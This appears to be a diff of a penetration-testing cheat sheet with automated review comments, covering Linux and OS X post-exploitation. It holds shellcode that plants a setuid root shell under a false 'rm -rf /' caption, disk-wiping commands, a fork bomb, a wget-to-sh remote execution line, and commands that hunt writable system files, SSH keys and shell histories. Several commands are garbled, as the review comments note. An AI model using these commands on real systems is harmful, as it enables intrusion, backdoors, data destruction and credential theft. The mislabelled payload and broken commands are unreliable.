||||
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
|
||||
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
|
||||
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
|
||||
"\x6e\x2f\x73\x68\x00\x2d\x63\x00?
|
||||
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
|
||||
Hex version of rm -rf /
|
||||
How is this supposed to work?
|
||||
|
||||
|
||||
mkfs.ext3 /dev/sda
|
||||
Reformat the device mentioned, making recovery of files hard.
|
||||
dd if=/dev/zero of=/dev/sda bs=1M
|
||||
Overwrite disk /dev/sda with zeros
|
||||
Execute a remote script
|
||||
|
||||
wget http://server/file.sh -O- | sh
|
||||
This command forces the download of a file and immediately its execution, can be exploited easily using or reverse shit
|
||||
Fork Bomb
|
||||
:(){:|:&};:
|
||||
|
||||
|
||||
The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
|
||||
|
||||
|
||||
Stolen from: http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
|
||||
World
|
||||
writable
|
||||
directories
|
||||
|
||||
|
||||
Find word writable folders outside your home directory. It would be a tremendous success if we could write, say to /etc. So we could add configuration files and therefore pretty sure execute code as root, since many daemons read a specific number of primary and secondary configuration files, whereas the secondary ones are often not created yet. If the superusers home (/root) would be writable, we could create shell startup files that doesn't exist yet: .profile,
|
||||
.bash_profile, .bashrc...
|
||||
find / \( -wholename
|
||||
'/home/homedir/*' -prune \) -o \
|
||||
( -type d -perm -0002 \) -exec
|
||||
ls -ld '{}' ';' 2>/dev/null
|
||||
|
||||
|
||||
World
|
||||
writable files
|
||||
What if /etc/passwd would be writable? Yeah, we just could add another root user and we would have won! Whereas the foregoing scenario is just too good to be
|
||||
true, it really makes sense to search for world writable files outside your own territory (= your home directory).
|
||||
find / \( -wholename
|
||||
'/home/homedir/*' -prune -o
|
||||
-wholename '/proc/*' -prune \)
|
||||
-o \( -type f -perm -0002 \)
|
||||
-exec ls -l '{}' ';' 2>/dev/null
|
||||
Logfiles
|
||||
Sometimes a security unaware administrator chmods a sensitive log file, because he couldn't view it and therefore leaks potentially sensitive data such as
|
||||
passwords or other important information.
|
||||
find /var/log -type f -perm
|
||||
-0004 2>/dev/null
|
||||
Setuid / setgid files
|
||||
We already examined fully why setuid and setgid files are worth to be double checked. Such a file owned by root and susceptible for attacks is a big weakness.
|
||||
find / \( -type f -or -type d \)
|
||||
-perm -6000 2>/dev/null
|
||||
|
||||
|
||||
|
||||
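Review bot: the page changes format after the System table: from `## Networking` on, section titles such as "User accounts", "Credentials", "Configs", "Determine Distro" and "Covering Your Tracks" are plain lines and the commands are bare text, so they render as run-on paragraphs; give them the same `##` headings and put commands in code spans or fenced blocks as the System table does. Several commands carry copy-paste residue that makes them wrong as written: `ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/nullte` (should end `2>/dev/null`), `cat /etc/cups/cupsd.confcda`, `xterm -display 10.0.0.1:1se`, `cd /home/; treels /home/*/.ssh/*`, the `.properties | grep [.]properties` line missing its `locate`, and the stray backtick before `/home/*/.*hist*` in the telnet grep. Others are broken independently of residue: `echo $PATH | 'sed s/:/ /g'` quotes the command name instead of the pattern (it should be `sed 's/:/ /g'`), `find / -type f -exec {}` has no command and no terminating `\;`, the crontab line pipes `cat /var/spool/cron/crontabs/*` into `cat /var/spool/cron/*` where `;` was meant, and the ruby reverse-shell line has the `nc -e /bin/sh 10.0.0.1 1234` entry fused onto its end. The C `char esp[]` blob under Deleting and Destroying is captioned "Hex version of rm -rf /", but the only readable part of it is `"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"`, which is not what the caption says, and the page itself asks "How is this supposed to work?"; an unexplained binary payload does not belong in a cheat sheet and should be dropped rather than kept under a wrong label. Spelling and loose ends: "Find word writable folders" should be "world writable", "reverse shit" in the wget row is presumably "reverse shell", "Avoiding history filesmys" should be "files", and "privileged accounts: cat" followed by "(above: cat ???)" is an unfinished entry that should be completed or removed.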
68
2besorted/gdoc_osx.md
Normal file
@@ -0,0 +1,68 @@
|
||||
|
||||
# OS X Google Doc Content #
|
||||
|
||||
The content below is the raw data from the Google Doc that was first used to collect it. Over time, this content will be moved into sub-pages and organized but is placed here, now, so as to be more complete. We apologize for its appearance.
|
||||
|
||||
----
|
||||
|
||||
## Blind Files
|
||||
(things to pull when all you can do is blindly read) LFI/dir traversal
|
||||
/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)
|
||||
|
||||
## System
|
||||
<code>uname -a
|
||||
ps aux
|
||||
ps -aef
|
||||
id
|
||||
arch
|
||||
w
|
||||
who -a
|
||||
gcc -v
|
||||
mysql --version
|
||||
perl -v
|
||||
ruby -v
|
||||
python --version
|
||||
df -k
|
||||
mount
|
||||
last -a
|
||||
lastlogin (*bsd)
|
||||
getenforce <- does not work on Lion no idea if this work in previous versions
|
||||
dmesg
|
||||
lsusb<- does not work on Lion no idea it this work on previous versions
|
||||
lshw <- does not work on Lion no idea it this work on previous versions
|
||||
free -m <- does not work on Lion no idea it this work on previous versions
|
||||
du -h --max-depth=1 /
|
||||
which nmap (see if it's already installed)
|
||||
locate bin/nmap
|
||||
which nc (see if it's already installed)
|
||||
locate bin/<whatever you want>
|
||||
whoami
|
||||
jps -l
|
||||
java -version</code>
|
||||
|
||||
## Networking
|
||||
<code>hostname -f
|
||||
ip addr show
|
||||
ifconfig -a
|
||||
route -n
|
||||
cat /etc/network/interfaces
|
||||
iptables -L -n
|
||||
netstat -anop
|
||||
netstat -r
|
||||
netstat -nltupw (root with raw sockets)
|
||||
arp -a
|
||||
lsof -nPi</code>
|
||||
|
||||
## Per User
|
||||
<code>ls -alh /Users/*/
|
||||
ls -alh /Users/*/.ssh/
|
||||
cat /Users/*/.ssh/authorized_keys
|
||||
cat /Users/*/.ssh/known_hosts
|
||||
cat /Users/*/.*hist*
|
||||
find -type f /Users/*/.vnc /Users/*/.subversion
|
||||
grep ^ssh /Users/*/.*hist*
|
||||
grep ^telnet `/Users/*/.*hist*
|
||||
grep ^mysql /Users/*/.*hist*
|
||||
cat /Users/*/.viminfo
|
||||
sudo -l # if sudoers is not readable, this sometimes works per user
|
||||
crontab -l</code>
|
||||
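Review bot: the command lists are wrapped in a single `<code>` element spanning many lines (`<code>uname -a` through `java -version</code>`); `<code>` is an inline element, so markdown renderers collapse the newlines and each list becomes one long line. Use a fenced code block or the table format the Linux page uses. Several entries are Linux commands that do not exist on OS X and should be flagged or dropped the way `getenforce`, `lsusb`, `lshw` and `free -m` already are: `ip addr show`, `cat /etc/network/interfaces` and `iptables -L -n` have no counterpart under those names (the packet filter on Lion and later is managed with `pfctl`), `route -n` with no subcommand errors on BSD route (`route -n get default` is the form that works), and the `-o`, `-t` and `-u` flags to `netstat` are GNU/Linux options while BSD `-p` expects a protocol name. `find -type f /Users/*/.vnc /Users/*/.subversion` puts the expression before the paths, which find rejects; it should be `find /Users/*/.vnc /Users/*/.subversion -type f`. Minor: the stray backtick before `/Users/*/.*hist*` in the telnet grep, and "wont" in the Blind Files note should be "won't".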